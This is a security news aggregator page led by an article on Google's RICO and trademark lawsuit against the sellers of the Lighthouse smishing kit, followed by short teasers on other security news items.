Google is suing more than two dozen unnamed individuals allegedly involved in peddling a popular China-based mobile phishing service that helps scammers impersonate hundreds of trusted brands, blast out text message lures, and convert phished payment card data into mobile wallets from Apple and Google. In a lawsuit   show more ...

filed in the Southern District of New York on November 12, Google sued to unmask and disrupt 25 “John Doe” defendants allegedly linked to the sale of Lighthouse, a sophisticated phishing kit that makes it simple for even novices to steal payment card data from mobile users. Google said Lighthouse has harmed more than a million victims across 120 countries. A component of the Chinese phishing kit Lighthouse made to target customers of The Toll Roads, which refers to several state routes through Orange County, Calif. Lighthouse is one of several prolific phishing-as-a-service operations known as the “Smishing Triad,” and collectively they are responsible for sending millions of text messages that spoof the U.S. Postal Service to supposedly collect some outstanding delivery fee, or that pretend to be a local toll road operator warning of a delinquent toll fee. More recently, Lighthouse has been used to spoof e-commerce websites, financial institutions and brokerage firms. Regardless of the text message lure used or brand used, the basic scam remains the same: After the visitor enters their payment information, the phishing site will automatically attempt to enroll the card as a mobile wallet from Apple or Google. The phishing site then tells the visitor that their bank is going to verify the transaction by sending a one-time code that needs to be entered into the payment page before the transaction can be completed. If the recipient provides that one-time code, the scammers can link the victim’s card data to a mobile wallet on a device that they control. Researchers say the fraudsters usually load several stolen wallets onto each mobile device, and wait 7-10 days after that enrollment before selling the phones or using them for fraud. Google called the scale of the Lighthouse phishing attacks “staggering.” A May 2025 report from Silent Push found the domains used by the Smishing Triad are rotated frequently, with approximately 25,000 phishing domains active during any 8-day period. Google’s lawsuit alleges the purveyors of Lighthouse violated the company’s trademarks by including Google’s logos on countless phishing websites. The complaint says Lighthouse offers over 600 templates for phishing websites of more than 400 entities, and that Google’s logos were featured on at least a quarter of those templates. Google is also pursuing Lighthouse under the Racketeer Influenced and Corrupt Organizations (RICO) Act, saying the Lighthouse phishing enterprise encompasses several connected threat actor groups that work together to design and implement complex criminal schemes targeting the general public. According to Google, those threat actor teams include a “developer group” that supplies the phishing software and templates; a “data broker group” that provides a list of targets; a “spammer group” that provides the tools to send fraudulent text messages in volume; a “theft group,” in charge of monetizing the phished information; and an “administrative group,” which runs their Telegram support channels and discussion groups designed to facilitate collaboration and recruit new members. “While different members of the Enterprise may play different roles in the Schemes, they all collaborate to execute phishing attacks that rely on the Lighthouse software,” Google’s complaint alleges. “None of the Enterprise’s Schemes can generate revenue without collaboration and cooperation among the members of the Enterprise. All of the threat actor groups are connected to one another through historical and current business ties, including through their use of Lighthouse and the online community supporting its use, which exists on both YouTube and Telegram channels.” Silent Push’s May report observed that the Smishing Triad boasts it has “300+ front desk staff worldwide” involved in Lighthouse, staff that is mainly used to support various aspects of the group’s fraud and cash-out schemes. An image shared by an SMS phishing group shows a panel of mobile phones responsible for mass-sending phishing messages. These panels require a live operator because the one-time codes being shared by phishing victims must be used quickly as they generally expire within a few minutes. Google alleges that in addition to blasting out text messages spoofing known brands, Lighthouse makes it easy for customers to mass-create fake e-commerce websites that are advertised using Google Ads accounts (and paid for with stolen credit cards). These phony merchants collect payment card information at checkout, and then prompt the customer to expect and share a one-time code sent from their financial institution. Once again, that one-time code is being sent by the bank because the fake e-commerce site has just attempted to enroll the victim’s payment card data in a mobile wallet. By the time a victim understands they will likely never receive the item they just purchased from the fake e-commerce shop, the scammers have already run through hundreds of dollars in fraudulent charges, often at high-end electronics stores or jewelers. Ford Merrill works in security research at SecAlliance, a CSIS Security Group company, and he’s been tracking Chinese SMS phishing groups for several years. Merrill said many Lighthouse customers are now using the phishing kit to erect fake e-commerce websites that are advertised on Google and Meta platforms. “You find this shop by searching for a particular product online or whatever, and you think you’re getting a good deal,” Merrill said. “But of course you never receive the product, and they will phish that one-time code at checkout.” Merrill said some of the phishing templates include payment buttons for services like PayPal, and that victims who choose to pay through PayPal can also see their PayPal accounts hijacked. A fake e-commerce site from the Smishing Triad spoofing PayPal on a mobile device. “The main advantage of the fake e-commerce site is that it doesn’t require them to send out message lures,” Merrill said, noting that the fake vendor sites have more staying power than traditional phishing sites because it takes far longer for them to be flagged for fraud. Merrill said Google’s legal action may temporarily disrupt the Lighthouse operators, and could make it easier for U.S. federal authorities to bring criminal charges against the group. But he said the Chinese mobile phishing market is so lucrative right now that it’s difficult to imagine a popular phishing service voluntarily turning out the lights. Merrill said Google’s lawsuit also can help lay the groundwork for future disruptive actions against Lighthouse and other phishing-as-a-service entities that are operating almost entirely on Chinese networks. According to Silent Push, a majority of the phishing sites created with these kits are sitting at two Chinese hosting companies: Tencent (AS132203) and Alibaba (AS45102). “Once Google has a default judgment against the Lighthouse guys in court, theoretically they could use that to go to Alibaba and Tencent and say, ‘These guys have been found guilty, here are their domains and IP addresses, we want you to shut these down or we’ll include you in the case.'” If Google can bring that kind of legal pressure consistently over time, Merrill said, they might succeed in increasing costs for the phishers and more frequently disrupting their operations. “If you take all of these Chinese phishing kit developers, I have to believe it’s tens of thousands of Chinese-speaking people involved,” he said. “The Lighthouse guys will probably burn down their Telegram channels and disappear for a while. They might call it something else or redevelop their service entirely. But I don’t believe for a minute they’re going to close up shop and leave forever.”

 Feed

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical security flaw impacting WatchGuard Fireware to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability in question is CVE-2025-9242 (CVSS score: 9.3), an out-of-bounds write vulnerability affecting Fireware OS 11.10.2 up to and including

 Feed

Cybersecurity researchers are calling attention to a large-scale spam campaign that has flooded the npm registry with thousands of fake packages since early 2024 as part of a likely financially motivated effort. "The packages were systematically published over an extended period, flooding the npm registry with junk packages that survived in the ecosystem for almost two years," Endor Labs

 Feed

Behind every click, there’s a risk waiting to be tested. A simple ad, email, or link can now hide something dangerous. Hackers are getting smarter, using new tools to sneak past filters and turn trusted systems against us. But security teams are fighting back. They’re building faster defenses, better ways to spot attacks, and stronger systems to keep people safe. It’s a constant race — every

 Feed

Cybersecurity researchers have uncovered a malicious Chrome extension that poses as a legitimate Ethereum wallet but harbors functionality to exfiltrate users' seed phrases. The name of the extension is "Safery: Ethereum Wallet," with the threat actor describing it as a "secure wallet for managing Ethereum cryptocurrency with flexible settings." It was uploaded to the Chrome Web Store on

 Feed

The Race for Every New CVE Based on multiple 2025 industry reports: roughly 50 to 61 percent of newly disclosed vulnerabilities saw exploit code weaponized within 48 hours. Using the CISA Known Exploited Vulnerabilities Catalog as a reference, hundreds of software flaws are now confirmed as actively targeted within days of public disclosure. Each new announcement now triggers a global race

 Feed

Malware families like Rhadamanthys Stealer, Venom RAT, and the Elysium botnet have been disrupted as part of a coordinated law enforcement operation led by Europol and Eurojust. The activity, which is taking place between November 10 and 13, 2025, marks the latest phase of Operation Endgame, an ongoing operation designed to take down criminal infrastructures and combat ransomware enablers

 Feed

A Russian-speaking threat behind an ongoing, mass phishing campaign has registered more than 4,300 domain names since the start of the year. The activity, per Netcraft security researcher Andrew Brandt, is designed to target customers of the hospitality industry, specifically hotel guests who may have travel reservations with spam emails. The campaign is said to have begun in earnest around

 AI

Tinder has got a plan to rummage through your camera roll, and Warren Buffett keeps popping up in convincing deepfakes dishing "number one investment tips." Meanwhile, will agentic AI replace your co-hosts before you can say "EDR for robots"? and why you should still read books. All this, plus Lily   show more ...

Allen's new album and Claude Code come up for discussion in episode 443 of the "Smashing Security" podcast, with special guest Ron Eddings.

2025-11
Aggregator history
Thursday, November 13
SAT
SUN
MON
TUE
WED
THU
FRI
NovemberDecemberJanuary